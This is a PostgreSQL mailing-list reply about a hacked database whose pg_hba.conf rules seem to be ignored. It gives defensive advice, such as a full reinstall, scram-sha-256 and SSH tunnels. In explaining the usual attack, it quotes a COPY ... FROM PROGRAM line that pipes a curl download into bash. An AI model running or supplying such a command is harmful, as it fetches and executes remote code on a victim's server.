Re: How to confirm the pg_hba.conf service is correctly working

> Have checked select * from pg_hba_file_rules results are consistent with
pg_hba.conf
> any ip and user still can login in db

Any proxy? port/ip - forwarding running in the background?

in the next time check the "client_addr".
- SELECT usename, client_addr FROM pg_stat_activity where client_addr is
not null ;

> a Postgres DB that was Hacked l
> When I remove pg software and reinstall pg software

I agree with others;
- please re-install the full system! ( not just the PostgreSQL! )

Usually, the attack sequence:
- open port, brute force attack + COPY ... FROM PROGRAM 'curl
http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" installed and running hidden in the background.

https://dev.to/sanchitsharma/investigation-into-postgres-malware-hack-2ai0
(2020.Mar
)
https://brycematheson.io/how-to-permanently-kill-and-remove-kdevtmpfsi-kinsing/

> host VJ VJ_USER 10.10.10.1/32 md5

imho:
- use different ports
- change "md5" to "scram-sha-256"
- maybe: add https://www.postgresql.org/docs/10/auth-delay.html
- for administrating use SSH tunnels:
https://www.postgresql.org/docs/10/ssh-tunnels.html ( and use a firewall -
for closing all external ports or use SSL )

Regards,
Imre

shing dong <s7eqs7eq(at)gmail(dot)com> ezt írta (időpont: 2021. dec. 23., Cs,
11:15):

> Your original post stated that you only had
>> host VJ VJ_USER 10.10.10.1/32 md5
>> in the pg_hba.conf file.
>> However the result of the select is considerably more ?
>
>
>
> DEAR
>
> I have tested this feature , only had
>
> host VJ VJ_USER 10.10.10.1/32 md5
>
> in the pg_hba.conf file
>
> Have checked select * from pg_hba_file_rules results are consistent with
> pg_hba.conf
>
> any ip and user still can login in db
>
> When I remove pg software and reinstall pg software , the function of
> pg_hba is working ,represent that the location and content of
> pg_hba.conf are correct
>
> Suspect that the function of pg_hba is destroyed?
>
>
>
>
>
>
>
>
>
>
> Dave Cramer <davecramer(at)postgres(dot)rocks> 於 2021年12月22日 週三 下午6:58寫道：
>
>>
>>
>> On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq(at)gmail(dot)com> wrote:
>>
>>> *Dear Dave *
>>>
>>> The result after reload is
>>>
>>> 2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19
>>> 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration
>>> files",,,,,,,,,""
>>>
>>> No other error message
>>>
>>> ------------------------------------------
>>>
>>> result of select * from pg_hba_file_rules
>>>
>>>
>>>
>>> line_number,type,database,user_name,address,netmask,auth_method,options,error
>>> 84,local,{all},{all},,,md5,,
>>> 86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
>>> 87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
>>> 88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
>>> 89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
>>> 92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
>>> 93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
>>> 94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
>>>
>>> 95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
>>>
>>> 96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
>>> 99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
>>> 100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
>>> 101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
>>> 102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
>>> 103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
>>> 104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
>>> 105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
>>> 106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
>>> 107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
>>> 108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
>>> 109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
>>> 110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
>>> 111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
>>> 112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
>>> 113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
>>> 114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
>>> 115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
>>> 116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
>>> 117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
>>> 118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
>>> 119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
>>> 120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
>>> 121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
>>> 122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
>>> 123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
>>> 124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
>>> 125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
>>> 126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
>>> 127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
>>> 128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
>>> 129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
>>> 130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
>>> 131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
>>> 132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
>>> 133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
>>> 135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
>>> 136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
>>> 137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
>>> 138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
>>> 139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
>>> 140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
>>> 141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
>>> 142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
>>> 143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
>>> 144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
>>> 145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
>>> 146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
>>> 147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
>>> 148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
>>> 149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
>>> 150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
>>> 153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
>>> 154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
>>> 155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
>>> 156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
>>> 157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
>>> 161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
>>> 165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
>>> 168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,
>>>
>>>
>>>
>>>
>>
>> Hmmm for some reason I did not reply to the list.
>>
>> At any rate.
>>
>> Your original post stated that you only had
>>
>> host VJ VJ_USER 10.10.10.1/32 md5
>>
>> in the pg_hba.conf file.
>>
>> However the result of the select is considerably more ?
>>
>>
>> Dave Cramer
>>
>>>